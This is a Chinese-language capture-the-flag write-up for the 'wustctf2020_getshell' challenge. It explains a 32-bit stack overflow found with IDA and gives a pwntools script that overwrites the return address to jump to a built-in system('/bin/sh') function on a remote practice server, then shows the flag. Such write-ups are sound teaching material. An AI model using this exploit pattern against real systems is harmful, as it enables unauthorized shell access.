解析
先checksec一下,发现开启了NX是32位的,直接拖入ida中
在main函数中没什么好看的,第一个函数中也没什么,第二个函数中存在栈溢出。
ssize_t vulnerable()
{
char buf; // [esp+0h] [ebp-18h]
return read(0, &buf, 0x20u);
}
buf分配的空间是大于栈空间的
-00000018 buf db ?
-00000017 db ? ; undefined
-00000016 db ? ; undefined
-00000015 db ? ; undefined
-00000014 db ? ; undefined
-00000013 db ? ; undefined
-00000012 db ? ; undefined
-00000011 db ? ; undefined
-00000010 db ? ; undefined
-0000000F db ? ; undefined
-0000000E db ? ; undefined
-0000000D db ? ; undefined
-0000000C db ? ; undefined
-0000000B db ? ; undefined
-0000000A db ? ; undefined
-00000009 db ? ; undefined
-00000008 db ? ; undefined
-00000007 db ? ; undefined
-00000006 db ? ; undefined
-00000005 db ? ; undefined
-00000004 db ? ; undefined
-00000003 db ? ; undefined
-00000002 db ? ; undefined
-00000001 db ? ; undefined
+00000000 s db 4 dup(?)
+00000004 r db 4 dup(?)
+00000008
+00000008 ; end of stack variables
先看看有没有自带的shell地址
.text:0804851B
.text:0804851B ; Attributes: bp-based frame
.text:0804851B
.text:0804851B public shell
.text:0804851B shell proc near
.text:0804851B ; __unwind {
.text:0804851B push ebp
.text:0804851C mov ebp, esp
.text:0804851E sub esp, 8
.text:08048521 sub esp, 0Ch
.text:08048524 push offset command ; "/bin/sh"
.text:08048529 call _system
.text:0804852E add esp, 10h
.text:08048531 nop
.text:08048532 leave
.text:08048533 retn
.text:08048533 ; } // starts at 804851B
.text:08048533 shell endp
.text:08048533
.text:08048534
这里有一处自带的shell的地址,那么脚本写出来,即可
脚本
from pwn import *
#p = process("./wustctf2020_getshell")
p = remote('node4.buuoj.cn',27008)
context(os = 'linux',arch = 'i386',log_level = 'debug')
payload = b'a'*(0x18+0x04) + p32(0x0804851B)
p.recv()
p.sendline(payload)
p.interactive()
之后cat flag,获得flag是flag{ddfdf580-975f-48d3-9847-86903ba2cc35}